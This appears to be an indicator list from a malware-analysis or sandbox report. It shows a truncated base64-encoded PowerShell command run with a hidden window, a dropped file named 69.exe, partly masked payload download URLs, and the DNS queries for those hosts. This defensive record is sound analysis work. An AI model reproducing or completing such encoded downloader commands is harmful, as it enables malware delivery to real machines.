Technical Information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -EncoD PAAjACAAVABkAHkAaAB0AGMAagBoAG4AaQB2AHMAIABoAHQAdABwAHMAOgAvAC8AdwB3AHcALgBtAGkAYwByAG8AcwBvAGYAdAAuAGMAbwBtAC8ASAB5AHoAdgBqAHUAawBhAGwAYwB1ACAAIwA+ACAAJABEAHYAdwBtAGgAdwBiAGIAagBuAHIAPQ...
- %HOMEPATH%\69.exe
- %HOMEPATH%\69.exe
- http://sc###sgo.com/pictures/5/
- http://www.ry###help.com/wp-admin/5modb/
- http://de####insight.com/wp-content/F3/
- http://nh####uanghuy.com/wp-admin/8yY8e/
- http://www.st###obal.com/cgi-bin/W/
- DNS ASK sc###sgo.com
- DNS ASK ry###help.com
- DNS ASK de####insight.com
- DNS ASK nh####uanghuy.com
- DNS ASK st###obal.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -EncoD PAAjACAAVABkAHkAaAB0AGMAagBoAG4AaQB2AHMAIABoAHQAdABwAHMAOgAvAC8AdwB3AHcALgBtAGkAYwByAG8AcwBvAGYAdAAuAGMAbwBtAC8ASAB5AHoAdgBqAHUAawBhAGwAYwB1ACAAIwA+ACAAJABEAHYAdwBtAGgAdwBiAGIAagBuAHIAPQ...' (with hidden window)